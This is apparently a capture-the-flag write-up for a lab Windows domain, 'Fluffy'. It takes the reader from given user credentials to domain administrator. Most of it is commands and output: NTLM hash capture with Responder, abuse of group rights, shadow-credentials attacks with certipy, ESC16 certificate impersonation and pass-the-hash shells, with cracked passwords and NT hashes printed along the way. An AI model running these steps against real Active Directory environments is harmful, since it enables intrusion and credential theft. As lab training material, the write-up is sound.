Fluffy

Quickie

User

We are provided access to the user j.fleischman:J0elTHEM4n1990!.

Using netexec, we can quickly scan for share access to see where the user can read/write to.

netexec smb 10.10.11.69 -u j.fleischman -p  J0elTHEM4n1990!  --shares
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 

We can easily see that IT share looks suspicious - let's use impacket-smbclient to check it out.

impacket-smbclient j.fleischman@10.10.11.69 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
Type help for list of commands
# ls
[-] No share selected
# use it
# ls
drw-rw-rw-          0  Wed Jun  4 05:55:26 2025 .
drw-rw-rw-          0  Wed Jun  4 05:55:26 2025 ..
drw-rw-rw-          0  Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw-    1827464  Fri May 16 22:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw-          0  Fri May 16 22:51:49 2025 KeePass-2.58
-rw-rw-rw-    3225346  Fri May 16 22:51:49 2025 KeePass-2.58.zip
-rw-rw-rw-     169963  Sat May 17 22:31:07 2025 Upgrade_Notice.pdf

Upgrade_notice.pdf suggest to use a particular cve - cloning it and using Responder gives us a callback!.

sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.85]
    Responder IPv6             [dead:beef:4::1053]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-I3SM06WIZWL]
    Responder Domain Name      [ZKM3.LOCAL]
    Responder DCE-RPC Port     [45843]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:8db68836481e820b:E7CA67E6FA52D8CE078F9DD8C82BA9DC:01010000000000000004A0DC17D5DB01A234CB70BDB43EAB00000000020008005A004B004D00330001001E00570049004E002D004900330053004D0030003600570049005A0057004C0004003400570049004E002D004900330053004D0030003600570049005A0057004C002E005A004B004D0033002E004C004F00430041004C00030014005A004B004D0033002E004C004F00430041004C00050014005A004B004D0033002E004C004F00430041004C00070008000004A0DC17D5DB0106000400020000000800300030000000000000000100000000200000BCC9F77CEF3A5344C19CD6ACA6DC3E43C26C4CC18FA1518DF4CD129014BDCAAE0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380035000000000000000000

Cracking it gives us access to the user p.agila:prometheusx-303.

As always, use bloodhound to map out possible AD attack vectors.

Looks simple enough

GenericAll lets us basically do anything to the group Service Accounts - we can add the newly obtained p.agila to it with net rpc

net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69                                                                                                                         
net rpc group members "Service Accounts"  -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S 10.10.11.69        
FLUFFY\ca_svc
FLUFFY\ldap_svc
FLUFFY\p.agila
FLUFFY\winrm_svc

GenericWrite lets us do either a targeted kerberoasting attack or shadow credentials attack (requires ADCS). Let's opt for shadow credentials as there is the presence of ca_svc here which suggest the use of ADCS.

certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip 10.10.11.69 -account 'winrm_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c'
[*] Adding Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '2d4b8dfd-2891-8b51-08be-dd4dc89dca2c' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ls
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../
*Evil-WinRM* PS C:\Users\winrm_svc> ls


    Directory: C:\Users\winrm_svc


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/17/2025  11:56 AM                Desktop
d-r---        5/19/2025   9:15 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\winrm_svc> cd Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ls


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/3/2025  10:04 AM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
<REDACTED>

Root

winrm_svc has GenericWrite writes to the users ldap_svc and ca_svcwhich means we can perform the shadow credentials attack again to retrieve their respective NThash.

certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ldap_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7'
[*] Adding Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID '3c2c1f80-d4f0-c53b-1542-654ae6c568a7' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
                                                                                                                             
certipy-ad shadow -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69 -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f538f689-fb88-05f3-c323-29489d51470c'
[*] Adding Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'f538f689-fb88-05f3-c323-29489d51470c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

ca_svc is part of the Cert Publisher Group which when queried with certipy, is vulnerable to ESC16

Looking at the documentation, we will go with scenario A as we fufill the criteria from the previous owned users.

Attacker (winrm_svc@fluffy.htb) has GenericWrite permission over a "victim" account (ca_svc@fluffy.htb). The victim account can enroll in any suitable client authentication template (e.g., the default "User" template) on the ESC16-vulnerable CA. The target for impersonation is administrator@fluffy.htb.

First, we need to set the upn of our victim account ca_svc to administrator@fluffy.htb

certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69  -upn 'administrator@fluffy.htb' -user 'ca_svc' update

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator@fluffy.htb
[*] Successfully updated 'ca_svc'

Next, we need to request for the certificate with the associated spn using the victim account ca_svc, specifying a template such as User

certipy-ad -debug req -k  -dc-host 10.10.11.69 -target DC01.fluffy.htb -ca fluffy-DC01-CA -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[+] Domain retrieved from CCache: FLUFFY.HTB
[+] Username retrieved from CCache: ca_svc
[+] Nameserver: None
[+] DC IP: None
[+] DC Host: '10.10.11.69'
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: 'FLUFFY.HTB'
[+] Username: 'CA_SVC'
[+] Trying to resolve 'DC01.fluffy.htb' at '192.168.125.2'
[!] DNS resolution failed: The DNS query name does not exist: DC01.fluffy.htb.
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/certipy/lib/target.py", line 442, in resolve
    answers = self.resolver.resolve(hostname, tcp=self.use_tcp)
  File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 1306, in resolve
    (request, answer) = resolution.next_request()
                        ~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/home/kali/.local/lib/python3.13/site-packages/dns/resolver.py", line 750, in next_request
    raise NXDOMAIN(qnames=self.qnames_to_try, responses=self.nxdomain_responses)
dns.resolver.NXDOMAIN: The DNS query name does not exist: DC01.fluffy.htb.
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from ca_svc.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: ca_svc
[+] Getting TGS for 'HOST/DC01.fluffy.htb'
[+] Got TGS for 'HOST/DC01.fluffy.htb'
[+] Trying to connect to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.69[\pipe\cert]
[*] Request ID is 17
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@fluffy.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Lastly, we need to revert the upn before authenticating as Administrator

certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes :33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.10.11.69  -upn 'ca_svc' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc
[*] Successfully updated 'ca_svc'

certipy-ad auth -pfx administrator@fluffy.htb -dc-ip 10.10.11.69 -username 'administrator' -domain fluffy.htb       
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@fluffy.htb'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
 evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat *
<REDACTED>

Last updated